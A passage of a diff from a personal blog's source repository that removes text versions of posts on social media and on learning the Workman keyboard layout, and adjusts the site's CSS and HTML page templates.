tweet" doesn't help either. Trying to make your Twitter timeline - BS-free is like trying to straighten a dog's tail. - - So what do I suggest then? I really don't know. Honestly, all social - media sucks. The entire idea is so contrived and the world would've - been better off without it -- the incessant, mind-numbing feed of - information. But the shinier turd here is the fediverse. It's not - governed by $BIGTECH, and extremists have decided to stick to their own - echo chambers like Gab. Oh, and the other side propagates massive - blocklists for the tiniest of infractions (defined by them), so they - effectively echo chambered themselves too. I'm not complaining. - - "All social media sucks, but the fediverse sucks less." - -- Me, 2020 - __________________________________________________________________ - - 1. By which I mean any two ideologically opposing groups. Not - restricted to politics. - 2. Most posts on that sub are just screenshots of tweets, so... - -References - - 1. https://icyphox.sh/blog/dont-news - 2. https://icyphox.sh/home/icy/leet/site/build/blog/twitter/temp.html#fn:1 - 3. https://nickpunt.com/blog/deescalating-social-media/ - 4. https://reddit.com/r/2meirl4meirl - 5. https://icyphox.sh/home/icy/leet/site/build/blog/twitter/temp.html#fn:2
@@ -1,93 +0,0 @@
- 24 October, 2020 - -The Workman keyboard layout - -I have a lot of free time on my hands (heh) - - I've been at my computer everyday, for at least 10 hours at minimum. - These past ~6 - 7 months have been the most I've ever used my computer. - Eventually, I started experiencing discomfort and pain -- especially in - my pinkie finger. Typing became a chore, and I found myself using my - shell's command history more just to avoid typing commands. I tried - using a wrist rest, different keyboard heights, but nothing helped. - - Thus began my search for a new keyboard layout, and it swiftly - concluded once I chanced upon the [1]Workman layout. According to the - website, it is supposedly an improvement over Colemak and Dvorak. I - skimmed through the numbers and other stats, but I honestly didn't - care. "Oh it's better than the popular alternative layouts? Okay that's - enough for me." - - workman layout - - I downloaded the tarball containing the different config files for - different platforms etc. I just needed the xmodmap -- that's the - easiest way to apply a keyboard layout. -$ xmodmap xmodmap.workman - - To practice the layout, I used [2]keybr.com. You can configure the - keyboard layout via the settings. Naturally, the first few days were - incredibly painful. I was only able to type short sentences with very - small words. I tried to not engage in heated discussions on IRC, for I - could not type up a response in time. However, if I did stumble into - one, I would switch back to QWERTY just for those couple of messages. - - I found myself making the switch less and less, over the next few days. - Chatting on IRC is a great way to learn a layout. Or chatting anywhere, - really. It forces you to get accustomed to the layout by typing the - common words used in conversation. I also made a tiny change to the - layout -- swapping the F and B keys, since typing the "fo" / "of" - digram in the same hand felt really weird. Soon enough, I was averaging - about 30 - 40 WPM within the first week of having switched to Workman. - - And then things at work started to pick up, and I had to do what I had - been dreading the most: edit code -- in Vim. It's fairly common - knowledge that Vim, by default, extensively uses the H, J, K and L keys - for navigation. Sure, there are better ways to move around and only - using those keys is frowned upon -- but it's a habit built over years, - and hard to shake off. After poking around for a bit, I found the - [3]vim-workman plugin. Forked it to apply the F/B change, and I began - using it. - - It was great at first. My Vim muscle memory was not hampered, as I was - able to use QWERTY in normal mode, and Workman in insert. But as I got - better at Workman, I found myself instinctively reaching for the - Workman keys in normal mode. Well, everything except for the H, J, K - and L keys. This quickly became bothersome and I uninstalled the plugin - to search for a better solution. - - Wait, don't I have a sick new [4]programmable mechanical keyboard? What - if I configure a layer on it just for the H, J, K, L keys? After - pouring through the manual for a bit, I eventually got it set up. I - even remapped the Caps Lock key to Fn so it's easier to access the - layer. So now, hitting Caps Lock+Y/N/E/O results in HJKL being pressed. - This took a little bit of getting used to, but it got easier with a bit - of practice. - - Since I don't rely on any plugin/remappings, I can use Vim as is on - remote machines too. Another bonus from this adventure was I actually - spent time learning better ways to navigate, and reduce my reliance on - HJKL. Overall, a big win. - - It's been over 4 weeks since my switch, I think, and I'm comfortably - averaging around 80 WPM. Still a good 20 WPM slower than QWERTY, but I - think it'll get better with time. And am I still able to use QWERTY? - Well, kinda. I still use QWERTY on my phone keyboard, since Workman - isn't an option on it and it's actually alright. However, when I use my - desktop to play Dota, I prefer using voice chat to communicate since - typing on QWERTY takes too long -- I am forced to hunt and peck. - Interestingly, after about 15 - 20 minutes on QWERTY, my brain kinda - just clicks back and I can type on it with relative ease. Not as fast - as I used to be, but it's manageable. - - All things considered, switching to Workman was one of the better - decisions I have made in life. It feels so nice to be able to type out - whole words in just the home row. It just flows so nicely, and it has - made typing so much more enjoyable again. - -References - - 1. https://workmanlayout.org/ - 2. https://keybr.com/ - 3. https://github.com/nicwest/vim-workman - 4. https://icyphox.sh/blog/ducky-one-2
@@ -52,7 +52,7 @@ }
.content > article, p, blockquote, ul { line-height: 1.5; - font-family: 'Charter'; + font-family: 'Charter', serif; font-feature-settings: normal; }@@ -61,7 +61,7 @@ margin: auto 5% auto 5%;
} .pull-right > p { - font-family: 'Charter'; + font-family: 'Charter', serif; } /*.content > h1, h2, h3, h4 {@@ -79,7 +79,7 @@ color: var(--dark);
} -.sitemap a, article a, a:hover { +article a, a:hover, footer a { color: inherit; background: 0; text-decoration: underline;@@ -136,7 +136,7 @@ }
.openring-feed > p { padding: 4px 8px 4px; - font-family: 'Charter'; + font-family: 'Charter', serif; } .sep {@@ -180,7 +180,7 @@ display: hidden;
} .pull-left { - grid-column: 2 / 9; + grid-column: 3 / 11; grid-row: 1; } .content {@@ -226,7 +226,7 @@ .sep {
display: hidden; } .pull-left { - grid-column: 4 / 8; + grid-column: 5 / 9; grid-row: 1; } .content {@@ -246,20 +246,22 @@ padding: 4px 8px 4px;
} } - .logo { - width: 180px; - margin-bottom: 20px; + width: 10%; } footer { - color: var(--gray); bottom: 20px; width: 100%; text-align: center; margin-bottom: 20px; } +.hero { + display: flex; + align-items: center; +} + header { top: 30px; display: inline-block;@@ -278,7 +280,7 @@ }
.muted { color: var(--gray); - font-family: 'Charter'; + font-family: 'Charter', serif; font-size: 18px; }@@ -308,7 +310,7 @@
img { max-width: 100%; margin: 0 auto; - display: block; +/* display: block; */ border: 0px solid transparent; border-radius: 5px; }@@ -318,6 +320,7 @@ .icons a {
color: unset; background: unset; border-bottom: unset; + text-decoration: none; } .icons a:hover {
@@ -1,33 +0,0 @@
-<!DOCTYPE html> -<html lang=en> - <link rel="stylesheet" href="/static/style.css" type="text/css"> - <link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico"> - <meta content="You seem lost, fam." name=description> - <meta charset="UTF-8"> - <meta name="viewport" content="initial-scale=1"> - <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> - <meta content="#222" name="theme-color"> - <meta name="HandheldFriendly" content="true"> - <meta name="twitter:card" content="summary_large_image"> - <meta name="twitter:site" content="@icyphox"> - <meta name="twitter:title" content="404"> - <meta name="twitter:description" content="You seem lost, fam."> - <meta name="twitter:image" content="/static/icyphox.png"> - <meta property="og:title" content="404"> - <meta property="og:type" content="website"> - <meta property="og:description" content="You seem lost, fam."> - <meta property="og:url" content="https://icyphox.sh"> - <meta property="og:image" content="/static/icyphox.png"> - <title> - 404 - </title> - <header> - {{ header }} - </header> - <body> - <h1 align="center"> - {{ body }} - </h1> - </body> - </div> -</html>
@@ -1,48 +0,0 @@
-<!DOCTYPE html> -<html lang=en> - <link rel="stylesheet" href="/static/style.css" type="text/css"> - <link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico"> - <link rel="alternate" type="application/rss+xml" title="RSS" href="https://icyphox.sh/blog/feed.xml"> - <meta name="description" content="{{ .Fm.Subtitle }}"> - <meta name="viewport" content="initial-scale=1"> - <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> - <meta charset="UTF-8"> - <meta content="#222" name="theme-color"> - <meta name="HandheldFriendly" content="true"> - <meta name="twitter:card" content="summary_large_image"> - <meta name="twitter:site" content="@icyphox"> - <meta name="twitter:title" content="{{ .Fm.Title }}"> - <meta name="twitter:description" content="{{ .Fm.Subtitle }}"> - <meta name="twitter:image" content="/static/icyphox.png"> - <meta property="og:title" content="{{ .Fm.Title }}"> - <meta property="og:type" content="website"> - <meta property="og:description" content="{{ .Fm.Subtitle }}"> - <meta property="og:url" content="https://icyphox.sh"> - <meta property="og:image" content="/static/icyphox.png"> - - <title> - {{ .Fm.Title }} - </title> - <body> - <section class="container"> - <div class="pull-left"> - <div class="content"> - {{ .Fm.Body }} - <table> - <tbody> - {% for p in posts %} - <tr> - <td align="left"><a href="/blog/{{ p.url }}">{{ p.title }}</a></td> - <!--<td align="right">{{ p.date }}</td>--> - </tr> - {% endfor %} - </table> - <p><em><b>Note</b>: My current opinions may differ from those expressed in these posts.</em> - </div> - </div> - <div class="pull-right"> - {{ .Cfg.Footer }} - </div> - </section> - </body> -</html>
@@ -1,35 +0,0 @@
-<!DOCTYPE html> -<html lang=en> - <link rel="stylesheet" href="/static/style.css" type="text/css"> - <link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico"> - <meta name="description" content="{{ subtitle }}"> - <meta name="viewport" content="initial-scale=1"> - <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> - <meta content="#222" name="theme-color"> - <meta charset="UTF-8"> - <meta name="HandheldFriendly" content="true"> - <meta name="twitter:card" content="summary_large_image"> - <meta name="twitter:site" content="@icyphox"> - <meta name="twitter:title" content="{{ title }}"> - <meta name="twitter:description" content="{{ subtitle }}"> - <meta name="twitter:image" content="/static/icyphox.png"> - <meta property="og:title" content="{{ title }}"> - <meta property="og:type" content="website"> - <meta property="og:description" content="{{ subtitle }}"> - <meta property="og:url" content="https://icyphox.sh"> - <meta property="og:image" content="/static/icyphox.png"> - <title> - {{ title }} - </title> - <header> - {{ header }} - </header> - <body> - <div class="content"> - {{ body }} - </div> - <footer> - {{ footer }} - </footer> - </body> -</html>
@@ -1,16 +0,0 @@
-<?xml version='1.0' encoding='UTF-8'?> -<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0"> - <channel> - <title>icyphox's blog</title> - <link>https://icyphox.sh/</link> - <description>Computers, security and computer security.</description> - <atom:link href="https://icyphox.sh/blog/feed.xml" rel="self" type="application/xml"/> - <image> - <title>icyphox logo</title> - <url>https://icyphox.sh/icyphox.png</url> - <link>https://icyphox.sh/</link> - </image> - <language>en-us</language> - <copyright>Creative Commons BY-NC-SA 4.0</copyright> - </channel> -</rss>
@@ -27,6 +27,10 @@ <body>
<section class="container"> <div class="pull-left"> <div class="content"> + <!-- + <header> + {{ .Cfg.Header }} + </header>--> {{ .Fm.Body }} <table> <tbody>@@ -38,10 +42,11 @@ {{ end }}
</table> <p><em><b>Note</b>: My current opinions may differ from those expressed in these posts.</em> </div> - </div> - <div class="pull-right"> + <footer> {{ .Cfg.Footer }} + </footer> </div> + </section> </body> </html>
@@ -1,68 +0,0 @@
-<!DOCTYPE html> -<html lang=en> - <link rel="stylesheet" href="/static/style.css" type="text/css"> - <link rel="stylesheet" href="/static/syntax.css" type="text/css"> - <link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico"> - <meta charset="UTF-8"> - <meta name="description" content="{{ subtitle }}"> - <meta name="viewport" content="initial-scale=1"> - <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> - <meta content="#222" name="theme-color"> - <meta name="HandheldFriendly" content="true"> - <meta name="twitter:card" content="summary_large_image"> - <meta name="twitter:site" content="@icyphox"> - <meta name="twitter:title" content="{{ title }}"> - <meta name="twitter:description" content="{{ subtitle }}"> - <meta name="twitter:image" content="/static/icyphox.png"> - <meta property="og:title" content="{{ title }}"> - <meta property="og:type" content="website"> - <meta property="og:description" content="{{ subtitle }}"> - <meta property="og:url" content="https://icyphox.sh"> - <meta property="og:image" content="/static/icyphox.png"> - <title> - {{ title }} - </title> - <body> - <div class="container"> - <div class="pull-left"> - <div class="content"> - <header> - {{ header }} - </header> - <section style="float: right"> - view in <a href="/txt/{{ url }}.txt">plain-text</a> - </section> - <section style="float: left"> - {{ date }} - </section> - <article style="clear: both" align="left"> - <h1>{{ title }}</h1> - <h2 class="subtitle">{{ subtitle }}</h2> - {{ body }} - </article> - <p class="muted">Questions or comments? - Send an email to - <a href="mailto:~icyphox/x@lists.sr.ht?Subject=Re: {{ title }}">~icyphox/x@lists.sr.ht</a>—my <a href="https://lists.sr.ht/~icyphox/x">public inbox</a>.</p> - - <hr> - <div class="openring"> - {% for f in feeds %} - {{ f }} - {% endfor %} - - </div> - <div style="float: right"> - <small> - Generated by <a href="https://github.com/icyphox/openring.py"> - openring.py - </a> - </small> - </div> - </div> - </div> - <div class="pull-right"> - {{ footer }} - </div> - </div> - </body> -</html>
@@ -36,9 +36,9 @@ <article>
{{ .Fm.Body }} </article> </div> - </div> - <div class="pull-right"> - {{ .Cfg.Footer }} + <footer> + {{ .Cfg.Footer }} + </footer> </div> </section> </body>
@@ -1,40 +0,0 @@
-<!DOCTYPE html> -<html lang=en> -<link rel="stylesheet" href="/static/style.css" type="text/css"> -<link rel="stylesheet" href="/static/syntax.css" type="text/css"> -<link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico"> -<meta name="description" content="{{ subtitle }}"> -<meta name="viewport" content="initial-scale=1"> -<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> -<meta charset="UTF-8"> -<meta content="#222" name="theme-color"> -<meta name="HandheldFriendly" content="true"> -<meta name="twitter:card" content="summary_large_image"> -<meta name="twitter:site" content="@icyphox"> -<meta name="twitter:title" content="{{ title }}"> -<meta name="twitter:description" content="{{ subtitle }}"> -<meta name="twitter:image" content="/static/icyphox.png"> -<meta property="og:title" content="{{ title }}"> -<meta property="og:type" content="website"> -<meta property="og:description" content="{{ subtitle }}"> -<meta property="og:url" content="https://icyphox.sh"> -<meta property="og:image" content="/static/icyphox.png"> -<html> - <title> - {{ title }} - </title> -<div class="container-text"> - <header class="header"> - {{ header }} - </header> -<body> - <div class="content"> - <div align="left"> - {{ body }} - </div> - <footer> - {{ footer }} - </footer> - </body> - </div> - </html>
@@ -29,9 +29,9 @@ <div class="content">
<header> {{ .Cfg.Header }} </header> - <section style="float: right"> + <!--<section style="float: right"> view in <a href="/txt/{{ .Fm.URL }}.txt">plain-text</a> - </section> + </section>--> <section style="float: left"> {{ .Fm.Date }} </section>@@ -44,6 +44,9 @@ <p class="muted">Questions or comments?
Send an email to <a href="mailto:~icyphox/x@lists.sr.ht?Subject=Re: {{ .Fm.Title }}">~icyphox/x@lists.sr.ht</a>—my <a href="https://lists.sr.ht/~icyphox/x">public inbox</a>.</p> </div> + <footer> + {{ .Cfg.Footer }} + </footer> </div> </div> </body>